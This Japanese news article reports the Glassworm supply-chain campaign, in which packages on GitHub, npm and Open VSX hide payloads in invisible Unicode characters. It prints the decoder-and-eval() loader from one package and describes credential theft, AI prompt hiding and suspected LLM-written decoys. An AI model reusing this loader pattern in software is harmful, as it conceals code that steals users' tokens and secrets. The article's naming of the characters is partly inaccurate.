サプライチェーン攻撃は、検出を回避するために不可視のUnicodeコードを使用します。

Aikido Securityのセキュリティ研究者らは、GitHub、NPM、Open VSXにアップロードされたパッケージ内の悪意ある機能を隠すために、見えないUnicodeコードを使用したサプライチェーン攻撃を発見しました。Glasswormと名付けられた攻撃グループは、2026年3月3日から3月9日にかけて、151の悪意あるパッケージをGitHubにアップロードしました。

見えないコードの仕組み

悪意あるパッケージは、エディタ、ターミナル、コードレビューインターフェースで表示されると見えなくなる、Public Use Areas（Public Use Accessとも呼ばれる）のUnicode文字を使用しています。コードの大部分は正常に見えますが、悪意ある機能やペイロードはこれらの見えない文字を使用してレンダリングされており、手動でのコードレビューや従来の防御策を無効化しています。

見えないUnicode文字は、コンピュータによって処理されると米国アルファベットのすべての文字を表しますが、人間には空白や空行として表示されます。JavaScriptインタープリタはこれらの文字を通常のコードとして読み取り、実行できます。

技術的な実装

分析されたパッケージの1つでは、攻撃者は見えない文字を使用して悪意あるペイロードをエンコードしていました。コードには、隠されたバイトを抽出してeval()に渡すデコーダ関数が含まれています：

const s = v => [...v].map(
  w => (
    w = w.codePointAt(0),
    w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
    w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
    null
  )
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));

s()に渡されるバックティック文字列は、ビューアでは空に見えますが、完全な悪意あるペイロードにデコードされる見えない文字を含んでいます。過去の事例では、デコードされたペイロードが、Solanaを配信チャネルとして使用して第二段階のスクリプトを取得・実行し、トークン、認証情報、秘密情報を盗んでいました。

攻撃の特徴

悪意あるパッケージは、特に検出が困難です。その理由は：

• コードの可視部分は高品質で現実的である
• 周囲の変更には、ドキュメントの微調整、バージョンの更新、小さなリファクタリング、バグ修正が含まれる
• 変更はターゲットプロジェクトのスタイルに一貫性がある
• 研究者らは、LLMが説得力のある正当なパッケージを生成するために使用されていると疑っている

このUnicode技術は、2024年にAIエンジンに供給される悪意あるプロンプトを隠すために初めて使用され、その後、従来のマルウェア攻撃に適応されました。検出された151のパッケージは、キャンペーンのごく一部を表している可能性が高く、初期アップロード以降、多くのパッケージが削除されています。